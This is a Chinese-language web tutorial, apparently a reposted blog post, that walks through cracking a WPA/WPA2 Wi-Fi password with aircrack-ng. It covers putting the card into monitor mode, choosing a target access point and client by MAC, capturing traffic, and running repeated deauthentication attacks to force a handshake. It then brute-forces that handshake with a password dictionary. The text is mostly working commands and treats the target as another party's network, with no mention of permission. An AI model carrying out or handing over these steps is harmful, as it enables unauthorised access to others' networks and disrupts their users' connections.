您好,登錄后才能下訂單哦!
聲明:本文參考了網上的眾多資料,加上自己的一晚上的奮斗實際操作總結
其中http://netsecurity.51cto.com/art/201105/264844_all.htm該文寫的比較詳細,可做參考。
1.查看無線網卡狀態,激活無線網卡
ifconfig
ifconfig wlan0 up
2. 激活無線網卡至monitor即監聽模式
airmon-ng start wlan0
3. 探測無線網絡,抓取無線數據包
在正式抓包之前,一般都是先進行預來探測,來獲取當前無線網絡概況,包括AP的SSID、MAC地址、工作頻道、無線客戶端MAC及數量等。
注意:此處的客戶端是指無線AP的客戶端,并非破解的主機
airodump-ng mon0
注意:此處的BSSID為AP的mac,STATION為客戶端的mac
找破解的目標是盡量選擇排行靠前,且有數據(data)的AP,記下這里的AP和STATION的mac,及信道(CH)
BSSID STATION CH
C8:3A:35:2D:5E:78 88:E3:AB:C3:A6:0F 7
airodump-ng -c 7 –w abc--bssid C8:3A:35:2D:5E:78 mon0
#對該AP抓取數據包并寫入abc文件
-c:該AP的無線信道
-w:表示要寫入的文件
--bssid:AP的mac地址
4. 進行Deauth***加速破解過程。
上面的窗口不關,讓其繼續抓包,此時重開第二個窗口進行Deauth***加速破解過程。
aireplay-ng -0 1 -aC8:3A:35:2D:5E:78 -c 88:E3:AB:C3:A6:0F mon0
運行后可能會出現如下錯誤
根據提示修改命令如下:
aireplay-ng--ignore-negative-one -0 1 -a C8:3A:35:2D:5E:78 -c 88:E3:AB:C3:A6:0F mon0
可以看到不再報錯,但是標識部分為【0 |31ACKS】表示沒有數據應答,因此需要重復該步驟知道這里有數據應答且第一個窗口出現握手包才行,才可以進行下一步操作,可以調高這里的***數字
aireplay-ng--ignore-negative-one -0 10-a C8:3A:35:2D:5E:78 -c 88:E3:AB:C3:A6:0F mon0
注意:該處出現應答數據
且剛才抓包數據的第一個窗口出現握手包,由于該出握手包一閃而過,在第二個窗口進行Deauth***需要留心觀察第一個窗口(我這里是截圖網上的,實際難以截圖,一閃而過)
5.做完上面關鍵的一步,接下來是激動人心的破解步驟了,WAP/WAP2均需要字典來破解,請提前下載好字典并放在破解系統上面
aircrack-ng -w beini.txt abc*.cap
-w:接破解的密碼字典
abc*.cap 為第一個窗口抓取的數據包
接下來的就是坐等結果,能不能成功看你的字典好壞,對方AP密碼難度系數,電腦的破解速度,和一點點運氣了
注明:不知道為什么復制不了截圖上去,詳情請見附件
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。